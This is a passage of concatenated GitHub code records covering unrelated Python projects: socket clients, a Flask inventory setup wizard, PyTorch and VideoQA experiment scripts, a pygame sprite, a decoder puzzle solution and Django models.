2 : Generate risk scores and save it in fiigures\n generate_risk_scores(dem_patients,classifier_eval=classifier_eval)\n\n\n","repo_name":"G2Lab/DCI_FL","sub_path":"helper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1809814986","text":"import socket\nimport sys\nimport os\nimport threading\n\ndef usage():\n\t\tprint(\"syntax : echo_client \")\n\t\tprint(\"sample : echo+client 127.0.0.1 1234\")\n\ndef check_receive(client_socket):\n\twhile True:\n\t\ttry:\n\t\t\tdata = client_socket.recv(2048)\n\t\t\tif not data:\n\t\t\t\tbreak\n\t\t\telif data.decode() == \"quit\":\n\t\t\t\tbreak\n\t\t\tprint(\"[received from server]\")\n\t\t\tprint(data.decode())\n\t\t\tprint(\"Input Request : \")\n\t\texcept:\n\t\t\tpass\n\n\tprint(\"[Server closed]\")\n\tclient_socket.close()\n\tos._exit(1)\n\ndef start_client(client_socket ,addr):\n\n\tprint(\"[\",addr, \" connected]\")\n\ttry:\n\t\tthr = threading.Thread(target = check_receive, args = (client_socket,))\n\t\tthr.daemon = True\n\t\tThr.start()\n\t\tprint(\"Input Request >> \")\n\t\twhile True:\n\t\t\tdata = input()\n\t\t\tclient_socket.send(data.encode())\n\t\t\tif(data == \"quit\"):\n\t\t\t\tbreak\n\t\t\n\texcept KeyboardInterrupt:\n\t\tpass\n\n\tfinally:\n\t\tprint(\"\\n[\", addr, \" disconnected]\")\n\t\tclient_socket.close()\n\t\tsys.exit(0)\n\ndef main():\n\tusage()\n\tif len(sys.argv) != 3:\n\t\tprint(\"[Syntax Error]\")\n\t\tsys.exit(1)\n\t\t\n\thost = sys.argv[1]\n\tport = int(sys.argv[2])\n\taddr = (host,port)\n\ttry:\n\t\tclient_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\t\tclient_socket.connect(addr)\n\texcept Exception as e:\n\t\tprint(\"[Failed to connect]\")\n\t\tprint(e)\n\t\tsys.exit(1)\n\n\tstart_client(client_socket, addr)\n\nif __name__=='__main__':\n\tmain()","repo_name":"2jongseok/echo_client_server","sub_path":"echo_client.py","file_name":"echo_client.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24948347632","text":"import matplotlib.pyplot as plt\nimport random\nrandomlist = []\nfor i in range(0,200):\n\tn = random.randint(1,30)\n\trandomlist.append(n)\n\n######## Using third party libray.########\n\nimport pandas as pd\ndf = pd.DataFrame (randomlist, columns = ['number'])\nprint (df.number[:170])\n\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX\nARMAmodel = SARIMAX(df.number[170], order = (1, 0, 1))\nARMAmodel = ARMAmodel.fit()\n\npred = ARMAmodel.get_forecast(len(df.index))\npred_df = pred.conf_int(alpha = 0.05)\n\npred_df[\"Predictions\"] = ARMAmodel.predict(start = pred_df.index[170], end = pred_df.index[-1])\npred_df.index = df.index\npred_out = pred_df[\"Predictions\"]\n\nprint(pred_out)\n","repo_name":"pacle002/FastAPI-Test","sub_path":"AllDatas/Arma.py","file_name":"Arma.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39213089458","text":"import pygame as pg\nimport ruamel.yaml\nimport pytweening as tween\n\nvec = pg.math.Vector2\n\n\nclass Item(pg.sprite.Sprite):\n \"\"\"\n Item class is used to place items on the map.\n Items use tween animations from the pytweening library.\n \"\"\"\n\n def __init__(\n self,\n settings: ruamel.yaml.comments.CommentedMap,\n game_client_data_item_img: pg.Surface,\n pos: vec,\n img,\n kind: str,\n ):\n self.settings = settings\n self._layer = self.settings[\"layer\"][\"item\"]\n self.bob_range = self.settings[\"items\"][\"bob_range\"]\n self.bob_speed = self.settings[\"items\"][\"bob_speed\"]\n pg.sprite.Sprite.__init__(self)\n self.image = game_client_data_item_img[img]\n self.kind = kind\n self.rect = self.image.get_rect()\n self.pos = pos\n self.rect.center = self.pos\n self.tween = tween.easeInOutSine\n self.step = 0\n self.dir = 1\n\n def update(self):\n # item bobbing motion\n offset = self.bob_range * (self.tween(self.step / self.bob_range) - 0.5)\n self.rect.centery = self.pos[1] + offset * self.dir\n self.step += self.bob_speed\n if self.step > self.bob_range:\n self.step = 0\n self.dir *= -1\n","repo_name":"mgear2/undervoid","sub_path":"src/sprites/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32644381145","text":"from usdm_excel.base_sheet import BaseSheet\nfrom usdm_excel.cross_ref import cross_references\nfrom usdm_excel.id_manager import id_manager\nimport traceback\nimport pandas as pd\nfrom usdm_model.indication import Indication\nfrom usdm_model.investigational_intervention import InvestigationalIntervention\n\nclass StudyDesignIISheet(BaseSheet):\n\n def __init__(self, file_path):\n try:\n super().__init__(file_path=file_path, sheet_name='studyDesignII')\n self.indications = []\n self.interventions = []\n for index, row in self.sheet.iterrows():\n xref = self.read_cell_by_name(index, [\"xref\", \"name\"])\n type = self.read_cell_by_name(index, \"type\")\n description = self.read_description_by_name(index, \"description\")\n label = self.read_cell_by_name(index, 'label', default=\"\")\n codes = self.read_other_code_cell_multiple_by_name(index, \"codes\")\n if type.upper() == \"IND\":\n try:\n item = Indication(id=id_manager.build_id(Indication), name=xref, description=description, label=label, codes=codes)\n except Exception as e:\n self._general_error(f\"Failed to create Indication object, exception {e}\")\n self._traceback(f\"{traceback.format_exc()}\")\n else:\n self.indications.append(item)\n cross_references.add(xref, item)\n else:\n try:\n item = InvestigationalIntervention(id=id_manager.build_id(InvestigationalIntervention), description=description, codes=codes)\n except Exception as e:\n self._general_error(f\"Failed to create InvestigationalIntervention object, exception {e}\")\n self._traceback(f\"{traceback.format_exc()}\")\n else:\n self.interventions.append(item)\n cross_references.add(xref, item) \n except Exception as e:\n self._general_error(f\"Exception [{e}] raised reading sheet.\")\n self._traceback(f\"{traceback.format_exc()}\")\n\n","repo_name":"data4knowledge/usdm","sub_path":"src/usdm_excel/study_design_ii_sheet/study_design_ii_sheet.py","file_name":"study_design_ii_sheet.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6514850949","text":"import os\nimport re\nimport yaml\nfrom flask import Blueprint, render_template, request\nfrom functions.bbui import load_yaml,save_yaml\n\ninitialize = Blueprint('initialize', __name__, template_folder='templates')\n\n##### INITIALIZE\n\n@initialize.route(\"/initialize/index.html\")\ndef initialize_index():\n return render_template(\"page.html.j2\", page_content_path=\"initialize/index.html\", page_title=\"Initialize\")\n\n@initialize.route(\"/initialize/step_1.html\")\ndef initialize_step_1():\n print('initialize_step_1')\n return render_template(\"page.html.j2\", page_content_path=\"initialize/step_1.html\", page_title=\"Initialization - Step 1\")\n\n@initialize.route(\"/initialize/step_2.html\", methods = ['POST'])\ndef initialize_step_2():\n\n global initialization_form\n\n if request.method == 'POST':\n initialization_form = {}\n print('initialize_step_2 POST')\n print(request.form)\n initialization_form = request.form.to_dict()\n print('Value' + str(initialization_form))\n return render_template(\"page.html.j2\", page_content_path=\"initialize/step_2.html\", page_title=\"Initialization - Step 2\")\n\n@initialize.route(\"/initialize/step_3.html\", methods = ['POST'])\ndef initialize_step_3():\n\n global initialization_form\n\n if request.method == 'POST':\n print('initialize_step_3 POST')\n print(request.form)\n initialization_form = Merge(initialization_form,request.form.to_dict())\n print('Value' + str(initialization_form))\n return render_template(\"page.html.j2\", page_content_path=\"initialize/step_3.html\", page_title=\"Initialization - Step 3\")\n\n@initialize.route(\"/initialize/report.html\", methods = ['POST'])\ndef initialize_report():\n\n global initialization_form\n\n if request.method == 'POST':\n print('initialize_report POST')\n print(request.form)\n initialization_form = Merge(initialization_form,request.form.to_dict())\n print('Value' + str(initialization_form))\n print('Creating new inventory.')\n print(' - Backup and clean current existing inventory.')\n os.system('mkdir -p /etc/bluebanquise/backups/')\n os.system('tar cvJf /etc/bluebanquise/backups/previous_inventory.tar.xz /etc/bluebanquise/inventory/')\n os.system('rm -Rf /etc/bluebanquise/inventory/')\n print(' - Copy base inventory.')\n os.system('cp -a data/initialize/inventory/ /etc/bluebanquise/')\n print(' - Setting parameters.')\n yaml_buffer = load_yaml('/etc/bluebanquise/inventory/group_vars/all/general_settings/general.yml')\n yaml_buffer['cluster_name'] = initialization_form['inventory_cluster_name']\n yaml_buffer['time_zone'] = initialization_form['inventory_time_zone']\n yaml_buffer['icebergs_system'] = initialization_form['inventory_icebergs_system']\n save_yaml('/etc/bluebanquise/inventory/group_vars/all/general_settings/general.yml',yaml_buffer)\n yaml_buffer = load_yaml('/etc/bluebanquise/inventory/group_vars/all/general_settings/network.yml')\n yaml_buffer['domain_name'] = initialization_form['inventory_domain_name']\n save_yaml('/etc/bluebanquise/inventory/group_vars/all/general_settings/network.yml',yaml_buffer)\n yaml_buffer = load_yaml('/etc/bluebanquise/inventory/group_vars/all/equipment_all/equipment_profile.yml')\n yaml_buffer['ep_operating_system']['distribution'] = initialization_form['ep_operating_system.distribution']\n yaml_buffer['ep_operating_system']['distribution'] = initialization_form['ep_operating_system.distribution']\n yaml_buffer['ep_operating_system']['distribution_major_version'] = initialization_form['ep_operating_system.distribution_major_version']\n yaml_buffer['ep_configuration']['keyboard_layout'] = initialization_form['ep_configuration.keyboard_layout']\n yaml_buffer['ep_configuration']['system_language'] = initialization_form['ep_configuration.system_language']\n save_yaml('/etc/bluebanquise/inventory/group_vars/all/equipment_all/equipment_profile.yml',yaml_buffer)\n\n print(str(yaml_buffer))\n return render_template(\"page.html.j2\", page_content_path=\"initialize/report.html\", page_title=\"Initialization - Report\")\n","repo_name":"oxedions/bbui","sub_path":"UI2/blueprints/initialize/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15425562114","text":"import sys\n\n\ndef bin_keys(max_length=7):\n length = 1\n while length <= max_length:\n fstring = '{:0' + str(length) + 'b}'\n for i in range(2**length - 1):\n yield fstring.format(i)\n\n length += 1\n\n\ndef make_header_map(header):\n return dict((k, v) for k, v in zip(bin_keys(), header))\n\n\ndef decode(header, message):\n # strip anything illegal from the message\n message = \"\".join([c for c in message if c in ('0', '1')])\n header_map = make_header_map(header)\n decoded = []\n\n def extract_segment(message):\n segment = []\n size, message = message[0:3], message[3:]\n size = int(size, 2)\n\n if size == 0:\n # we've reached '000', the termination string\n return ([], \"\")\n\n key, message = message[0:size], message[size:]\n while int(key, 2) != (2**(size) - 1): # while the key isn't all ones\n segment.append(key)\n key, message = message[0:size], message[size:]\n\n return segment, message\n\n keep_going = True\n while keep_going:\n segment, message = extract_segment(message)\n if not message:\n keep_going = False\n\n decoded.extend([header_map[key] for key in segment])\n\n return \"\".join(decoded)\n\n\ndef find_last_header_char(s):\n return max([(i, c) for i, c in enumerate(s) if c not in ('0, 1')])\n\n\ndef process_line(line):\n line = line.strip()\n if not line:\n return\n\n pos, _ = find_last_header_char(line)\n pos += 1\n header, message = line[0:pos], line[pos:]\n print(decode(header, message))\n\n\ndef test():\n line = '$#**\\\\0100000101101100011100101000'\n process_line(line)\n\nif __name__ == '__main__':\n with open(sys.argv[1]) as lines:\n for line in lines:\n process_line(line)\n","repo_name":"cmdouglas/codeeval","sub_path":"decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32464353075","text":"limit = int(input(\"Enter limit =>\"))\nsum=0\nnumber=0\ni = 1\nwhile i <= limit:\n print(i)\n sum=sum+i\n i = i + 1\n\nprint(\"The sum of all the numbers =>\",sum)","repo_name":"TheOriginalDev/Python","sub_path":"Python_Programs/extra/extra11.py","file_name":"extra11.py","file_ext":"py","file_size_in_byte":160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"705287533","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nimport random\nimport os\nimport os.path as osp\nimport logging\nfrom transformers import get_cosine_schedule_with_warmup, BertTokenizer\nfrom args import get_args\nfrom model.vqa_model import VGT\nfrom loss import LogSoftmax\nfrom util import compute_a2v, load_model_by_key, save_to\nfrom train.train_videoqa import train, eval\nfrom data.vqa_loader import get_videoqa_loaders\nfrom embed_loss import MultipleChoiceLoss\nimport h5py\nimport collections\nfrom util import compute_aggreeings, AverageMeter, get_mask, mask_tokens\nimport json\nimport pandas as pd\nfrom tqdm import tqdm\n\ntorch.backends.cudnn.enabled = False\ntorch.backends.cudnn.benchmark = True\n \n \ndef eval(model, data_loader, device, a2v, args, save_csv, test=False):\n model.eval()\n count = 0\n metrics, counts = collections.defaultdict(int), collections.defaultdict(int)\n columns=['qid', 'prediction', 'answer']\n \n with torch.no_grad():\n if not args.mc:\n model.module._compute_answer_embedding(a2v)\n results = []\n for i, batch in enumerate(tqdm(data_loader)):\n answer_id, answer, video_o, video_f, question, question_id = (\n batch[\"answer_id\"],\n batch[\"answer\"],\n batch[\"video_o\"].cuda(),\n batch[\"video_f\"].cuda(),\n batch[\"question\"].cuda(),\n batch['question_id']\n )\n \n video_len = batch[\"video_len\"]\n seq_len = batch[\"seq_len\"]\n question_mask = (question > 0).float()\n answer_mask = (answer > 0).float()\n video_mask = get_mask(video_len, video_f.size(1)).cuda()\n count += answer_id.size(0)\n video = (video_o, video_f)\n if not args.mc:\n predicts = model(\n video,\n question,\n text_mask=question_mask,\n video_mask=video_mask,\n seq_len = seq_len\n )\n topk = torch.topk(predicts, dim=1, k=10).indices.cpu()\n if args.dataset != \"ivqa\":\n answer_id_expanded = answer_id.view(-1, 1).expand_as(topk)\n else:\n answer_id = (answer_id / 2).clamp(max=1)\n answer_id_expanded = answer_id\n metrics = compute_aggreeings(\n topk,\n answer_id_expanded,\n [1, 10],\n [\"acc\", \"acc10\"],\n metrics,\n ivqa=(args.dataset == \"ivqa\"),\n )\n for bs, qid in enumerate(question_id):\n results.append([qid, int(topk.numpy()[bs,0]), int(answer_id.numpy()[bs])]) \n else:\n fusion_proj, answer_proj = model(\n video,\n question,\n text_mask=answer_mask,\n video_mask=video_mask,\n answer=answer.cuda(),\n seq_len = seq_len\n )\n # predicts = fusion_proj.squeeze() \n fusion_proj = fusion_proj.unsqueeze(2)\n predicts = torch.bmm(answer_proj, fusion_proj).squeeze()\n predicted = torch.max(predicts, dim=1).indices.cpu()\n metrics[\"acc\"] += (predicted == answer_id).sum().item()\n for bs, qid in enumerate(question_id):\n results.append([qid, int(predicted.numpy()[bs]), int(answer_id.numpy()[bs])])\n\n acc = metrics[\"acc\"] / count\n print(f\"Test accuracy: {acc}\")\n \n for k in metrics:\n # print(metrics[k], count)\n v = metrics[k] / count\n print(f\"{k}: {v:.3%}\")\n break\n df = pd.DataFrame(results, columns=columns)\n df.to_csv(save_csv, index=False)\n \n return results\n\ndef main(model_path, sample_list_path, feat_path, save_csv):\n args = get_args()\n torch.cuda.manual_seed(args.seed)\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n if not (os.path.isdir(args.save_dir)):\n os.mkdir(os.path.join(args.save_dir))\n logging.basicConfig(\n level=logging.INFO, format=\"%(asctime)s %(levelname)-8s %(message)s\"\n )\n logFormatter = logging.Formatter(\"%(asctime)s %(levelname)-8s %(message)s\")\n rootLogger = logging.getLogger()\n fileHandler = logging.FileHandler(os.path.join(args.save_dir, \"stdout.log\"), \"w+\")\n fileHandler.setFormatter(logFormatter)\n rootLogger.addHandler(fileHandler)\n logging.info(args)\n\n # get answer embeddings\n bert_tokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\")\n # special_tokens_dict = {'additional_special_tokens': ['[TSW]']}\n # bert_tokenizer.add_special_tokens(special_tokens_dict)\n \n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n \n a2id, id2a, a2v = None, None, None\n if not args.mc:\n a2id, id2a, a2v = compute_a2v(\n vocab_path=args.vocab_path,\n bert_tokenizer=bert_tokenizer,\n amax_words=args.amax_words,\n )\n logging.info(f\"Length of Answer Vocabulary: {len(a2id)}\")\n\n # Model\n model = VGT(\n bert_tokenizer = bert_tokenizer,\n feature_dim=args.feature_dim,\n word_dim=args.word_dim,\n N=args.n_layers,\n d_model=args.embd_dim,\n d_ff=args.ff_dim,\n h=args.n_heads,\n dropout=args.dropout,\n T=args.max_feats,\n Q=args.qmax_words,\n baseline=args.baseline,\n bnum=args.bnum,\n CM_PT=args.CM_PT,\n dataset=args.dataset\n )\n model.to(device)\n logging.info(\"Using {} GPUs\".format(torch.cuda.device_count()))\n\n # Load pretrain path\n model = nn.DataParallel(model)\n args.pretrain_path = model_path\n if args.pretrain_path != \"\":\n # model.load_state_dict(torch.load(args.pretrain_path))\n model.load_state_dict(load_model_by_key(model, args.pretrain_path))\n logging.info(f\"Loaded checkpoint {args.pretrain_path}\")\n logging.info(\n f\"Nb of trainable params:{sum(p.numel() for p in model.parameters() if p.requires_grad)}\"\n )\n\n args.test = True\n args.features_path = feat_path \n args.test_csv_path = osp.join(sample_list_path, \"test.csv\")\n _, _, test_loader = get_videoqa_loaders(args, args.features_path, a2id, bert_tokenizer, test_mode = args.test)\n\n if args.test:\n logging.info(\"number of test instances: {}\".format(len(test_loader.dataset)))\n\n # Training\n if args.test: \n # Evaluate on test set\n csv_save_path = osp.join(args.save_dir, 'VGT_test_results.csv')\n results = eval(model, test_loader, device, a2v, args, csv_save_path, test=True)\n\n\n\nif __name__ == \"__main__\":\n model_path=\"/home/adithyas/VGT_data/nextqa/VGT_B20_Web64/best_model.pth\"\n sample_list_path = '/home/adithyas/VGT_data/nextqa'\n feat_path = \"/home/adithyas/VGT_data/nextqa\"\n save_csv=\"/home/adithyas/11777-videoQA/atp-video-language/VGT_test_results.csv\"\n main(model_path, sample_list_path, feat_path, save_csv)","repo_name":"11777-MMML/11777-videoQA","sub_path":"VGT/test_VGT_models.py","file_name":"test_VGT_models.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"739415570","text":"\nimport load\n\nload.init(\"./module\")\n\nfrom packet import Packet\nfrom sk import Client\nimport program\n\nfrom threading import Thread\nfrom PIL import ImageGrab\nimport numpy as np\nimport json\nimport time\n\n# set client\n# client = Client(\"125.182.224.34\", 8080)\nclient = Client(\"192.168.219.110\", 8080)\n\ndef getBackgroundImage() :\n img = ImageGrab.grab().resize((650, 350))\n img_list = np.array(img).tolist()\n\n return img_list\n\nclient.connect()\n\nschool_info1 = input(\"학급을 입력해주세요 : \")\nschool_info2 = input(\"학번을 입력해주세요 : \")\n\nhandshake_packet = Packet(\"client_handshake\", school_info1)\nclient.send(handshake_packet.encode())\n\nsip_packet = Packet(\"sip\", school_info2)\nclient.send(sip_packet.encode())\n\ndef start() :\n while True :\n data = client.receive(1024)\n p = Packet.decode(data)\n\n if p.packet == \"program\" :\n pro = json.dumps(program.getVisiableProgram()).encode()\n\n # send packet length\n pp_packet = Packet(\"pp\", pro)\n pp_len_packet = Packet(\"pp_len\", len(pp_packet.encode()))\n \n client.send(pp_len_packet.encode())\n client.send(pp_packet.encode())\n\n print(p.packet)\n\n elif p.packet == \"background\" :\n background = json.dumps(getBackgroundImage())\n\n # send packet length\n ip_packet = Packet(\"ip\", background)\n ip_len_packet = Packet(\"ip_len\", len(ip_packet.encode()))\n\n client.send(ip_len_packet.encode())\n client.send(ip_packet.encode())\n\n print(p.packet)\n\n elif p.packet == \"error\" :\n print(p.data)\n\n break\n\n elif p.packet == \"exit\" :\n print(\"client exit.\")\n\n break\n\nstart()","repo_name":"moonsung1234/RCP","sub_path":"client_home.py","file_name":"client_home.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30826482016","text":"# coding: utf-8\nimport json\nimport time\nimport torch\nimport torch.nn as mods\nimport torch.nn.functional as F\nfrom trainer import Trainer as CustomNetTrainer\nfrom experiment import Experimenter\nfrom dlc_practical_prologue import load_data, args\nfrom pprint import pprint\n\n\nclass CustomNet(torch.nn.Module):\n \"\"\"Customizable CNN\n\n Args:\n is_cifar -- should be set to True if using CIFAR rather than MNIST\n hidden_units -- size of the last hidden layer\n exp_factor -- to experiment on \"pre-CE\" normalization\n \"\"\"\n\n def __init__(self, is_cifar=args.cifar, hidden_units=200, exp_factor=1):\n super(CustomNet, self).__init__()\n # If cifar dataset, 3 channels, if mnist only 1\n self.conv1 = mods.Conv2d(3 if is_cifar else 1, 32, kernel_size=5)\n self.conv2 = mods.Conv2d(32, 64, kernel_size=5)\n self.fc1 = mods.Linear(256, hidden_units)\n self.fc2 = mods.Linear(hidden_units, 10)\n self.exp_factor = exp_factor\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), kernel_size=3, stride=3))\n x = F.relu(F.max_pool2d(self.conv2(x), kernel_size=2, stride=2))\n x = x.view(-1, 256)\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n if self.exp_factor > 0:\n x = F.log_softmax(x.pow(self.exp_factor))\n elif self.exp_factor == 0:\n x = F.log_softmax(x.exp())\n elif self.exp_factor == -1:\n x = x.div(x.sum())\n return x\n\n\nclass CustomNetConv3(torch.nn.Module):\n\n def __init__(self, hidden_units=200):\n super(CustomNetConv3, self).__init__()\n self.conv1 = mods.Conv2d(1, 16, kernel_size=3)\n self.conv2 = mods.Conv2d(16, 32, kernel_size=4)\n self.conv3 = mods.Conv2d(32, 64, kernel_size=2)\n self.fc1 = mods.Linear(256, hidden_units)\n self.fc2 = mods.Linear(hidden_units, 10)\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2(x), 2))\n x = F.relu(F.max_pool2d(self.conv3(x), 2))\n x = x.view(-1, 256)\n x = F.relu(self.fc1(x))\n return self.fc2(x)\n\n\nparameters = dict(\n steps=50,\n optimizer_class=torch.optim.Adam,\n optimizer_params=dict(),\n minibatch_size=args.batchsize,\n)\n\n\ndatasets = dict(\n cifar=dict(normal=None, full=None),\n mnist=dict(normal=None, full=None),\n)\n\n\ndef get_data(name='cifar' if args.cifar else 'mnist',\n size='full' if args.full else 'normal'):\n \"\"\"Retrieves desired dataset\n\n Args:\n name -- name of dataset, defaults to mnist or commandline\n size -- 'nomral' for restricted version of dataset to 1000 examples, 'full' otherwise\n \"\"\"\n if datasets[name][size]:\n return datasets[name][size]\n\n # Initialize data\n train_data, train_target, test_data, test_target = load_data(\n normalize=True,\n one_hot_labels=False,\n flatten=False,\n cifar=True if name == 'cifar' else False,\n data_size=size,\n )\n\n # Adapt it for GPU computation if appropriate\n datasets[name][size] = dict(\n training_input=train_data if not(torch.cuda.is_available()) else train_data.cuda(),\n training_target=train_target if not(torch.cuda.is_available()) else train_target.cuda(),\n test_input=test_data if not(torch.cuda.is_available()) else test_data.cuda(),\n test_target=test_target if not(torch.cuda.is_available()) else test_target.cuda(),\n )\n\n return datasets[name][size]\n\n\nclass Xprunner(object):\n \"\"\"Wrapper class to run Experimenter more efficiently \"\"\"\n\n def __init__(self):\n pass\n\n def conv3_experiment(self):\n \"\"\"3 conv layer experiment (ex. 4)\"\"\"\n data = get_data()\n\n def conv3_xp(convnet):\n parameters['step'] = 100\n return CustomNetTrainer(convnet(), data, parameters).train()\n\n results = Experimenter(conv3_xp).experiment(\n {'convnet': [CustomNetConv3, CustomNet]},\n iterations=5\n )\n with open(\"conv3_xp_{}_{}.json\".format(args.suffix, int(time.time())), 'w') as res_file:\n json.dump(results, res_file)\n\n def hidden_layer_experiment(self, hidden_layers=[10, 50], iters=1, cifar=False):\n \"\"\"Hidden layer experiment (ex. 3)\"\"\"\n data = get_data()\n\n def compute_hidden_layer_test_error(hidden_layer_size):\n return CustomNetTrainer(\n CustomNet(hidden_units=hidden_layer_size),\n data,\n parameters,\n loss=mods.CrossEntropyLoss()\n ).train()\n\n return Experimenter(compute_hidden_layer_test_error, pprint).experiment(\n {'hidden_layer_size': hidden_layers},\n iterations=iters,\n json_dump=True,\n )\n\n def sgd_experiment(self):\n \"\"\"\n Trying various SGD parameters to see how they influence learning speed\n (by using the proxy of accuracy at a fixed speed)\n \"\"\"\n def compute_optimizer_test_error(optim):\n parameters = dict(\n steps=25,\n optimizer_class=optim['class'],\n optimizer_params=optim['params'],\n minibatch_size=args.batchsize,\n )\n return CustomNetTrainer(CustomNet(), get_data(), parameters).train()\n\n return Experimenter(compute_optimizer_test_error, pprint).experiment(\n {'optim': [\n {'class': torch.optim.SGD, 'params': {'lr': 0.1, 'momentum': 0}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.2, 'momentum': 0}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.05, 'momentum': 0}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.1, 'momentum': 1}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.2, 'momentum': 1}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.05, 'momentum': 1}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.1, 'momentum': 0.5}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.2, 'momentum': 0.5}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.05, 'momentum': 0.5}},\n {'class': torch.optim.Adam, 'params': {}}\n ]\n },\n iterations=5,\n json_dump=True,\n )\n\n def loss_experiment(self):\n \"\"\"\n Tries multiple losses to see which performs best\n \"\"\"\n def compute_loss_test_error(exp_factor, dataset, dataset_size):\n return CustomNetTrainer(\n CustomNet(is_cifar=(dataset == 'cifar')),\n get_data(dataset, dataset_size),\n parameters,\n mods.NLLLoss()\n ).train(25)\n\n return Experimenter(compute_loss_test_error, pprint).experiment(\n {\n 'exp_factor': [-1, 0, 0.1, 1, 15],\n 'dataset': ['mnist', 'cifar'],\n 'dataset_size': ['normal', 'full'],\n },\n iterations=10,\n json_dump=True,\n )\n\n def default_xp(self):\n global data\n data = get_data()\n pprint(self.hidden_layer_experiment())\n","repo_name":"philipperolet/tensor","sub_path":"main_lossxp1.py","file_name":"main_lossxp1.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3981365910","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n\nclass Feedback(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n feedback = models.TextField(max_length=4096, null=True, blank=True)\n context = models.TextField(max_length=4096*4, null=True, blank=True)\n\n human_approved = models.BooleanField(default=False)\n human_edited = models.BooleanField(default=False)\n user_feedback = models.TextField(max_length=4096, null=True, blank=True)\n\n planner_score = models.FloatField(default=0.0, validators=[MinValueValidator(0.0), MaxValueValidator(100.0)])\n guardian_score = models.FloatField(default=0.0, validators=[MinValueValidator(0.0), MaxValueValidator(100.0)])\n mentor_score = models.FloatField(default=0.0, validators=[MinValueValidator(0.0), MaxValueValidator(100.0)])\n motivator_score = models.FloatField(default=0.0, validators=[MinValueValidator(0.0), MaxValueValidator(100.0)])\n assessor_score = models.FloatField(default=0.0, validators=[MinValueValidator(0.0), MaxValueValidator(100.0)])\n\n def __str__(self):\n return \"{}. {}\".format(str(self.id), self.user)\n \nclass LearnerModel(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n full_name = models.CharField(max_length=1024, null=True, blank=True)\n school_level = models.CharField(max_length=1024, null=True, blank=True)\n years_of_experience = models.FloatField(default=0.0)\n role = models.CharField(max_length=4096, null=True, blank=True)\n skill_interests = models.TextField(max_length=4096, null=True, blank=True)\n other_interests = models.TextField(max_length=4096, null=True, blank=True)\n\n school = models.CharField(max_length=1024, null=True, blank=True)\n\n planner_score = models.FloatField(default=0.0)\n guardian_score = models.FloatField(default=0.0)\n mentor_score = models.FloatField(default=0.0)\n motivator_score = models.FloatField(default=0.0)\n assessor_score = models.FloatField(default=0.0)\n\n series_completed = models.CharField(max_length=1024, null=True, blank=True) # JSON. e.g. {'teaching': 2, 'coaching': 2, 'digital': 3}\n\n current_feedback = models.ForeignKey(Feedback, on_delete=models.SET_NULL, null=True, blank=True)\n cluster = models.IntegerField(default=0, null=True, blank=True)\n\n def __str__(self):\n return \"{}. {}\".format(str(self.id), self.user)\n \nclass Track(models.Model):\n title = models.CharField(max_length=4096)\n\n def __str__(self):\n return \"{}: {} \".format(str(self.id), self.title)\nclass Series(models.Model):\n title = models.CharField(max_length=4096)\n track = models.ForeignKey(Track, on_delete=models.CASCADE, null=True, blank=True)\n track_order = models.IntegerField(default=0, null=True, blank=True)\n\n primary_level = models.BooleanField(default=False)\n secondary_level = models.BooleanField(default=False)\n admin_level = models.BooleanField(default=False)\n\n def __str__(self):\n return \"{}: {} \".format(str(self.id), self.title)\nclass Video(models.Model):\n title = models.CharField(max_length=4096)\n tags = models.CharField(max_length=4096, help_text = \"comma-separated list of tags\")\n description = models.CharField(max_length=4096, default=\"\")\n url = models.CharField(max_length=1024, unique=True)\n\n series = models.ForeignKey(Series, on_delete=models.CASCADE, null=True, blank=True)\n series_order = models.IntegerField(default=0, null=True, blank=True)\n\n def __str__(self):\n return \"{}. {}\".format(str(self.id), self.title)\n \n class Meta:\n ordering = ('series_order', )\n\nclass VideoQuestion(models.Model):\n video = models.ForeignKey(Video, 